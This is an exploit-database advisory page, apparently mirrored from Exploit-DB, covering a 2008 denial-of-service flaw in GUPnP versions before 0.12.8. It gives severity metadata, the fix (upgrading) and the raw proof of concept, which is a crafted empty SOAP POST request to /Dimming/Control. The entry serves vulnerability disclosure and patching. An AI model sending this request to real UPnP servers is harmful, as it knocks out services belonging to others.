header-logo
Suggest Exploit
vendor:
GUPnP
by:
SecurityFocus
7.5
CVSS
HIGH
Denial of Service
399
CWE
Product Name: GUPnP
Affected Version From: GUPnP 0.12.7 and earlier
Affected Version To: GUPnP 0.12.8
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

GUPnP Denial of Service Vulnerability

GUPnP is prone to a vulnerability that remote attackers may exploit to cause denial-of-service conditions. An attacker can send a specially crafted POST request to the vulnerable server to trigger this vulnerability.

Mitigation:

Upgrade to GUPnP 0.12.8 or later.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/35390/info

GUPnP is prone to a vulnerability that remote attackers may exploit to cause denial-of-service conditions.

Versions prior to GUPnP 0.12.8 are affected. 

======== ACTION MESSAGE ==========
POST /Dimming/Control HTTP/1.1 SOAPAction: "urn:schemas-upnp-org:service:Dimming:1#GetLoadLevelStatus"
Host: www.example.com:41615 Content-Type: text/xml
Content-Length: 0
==================================

Navigation

Suggest Exploit

Services By CQR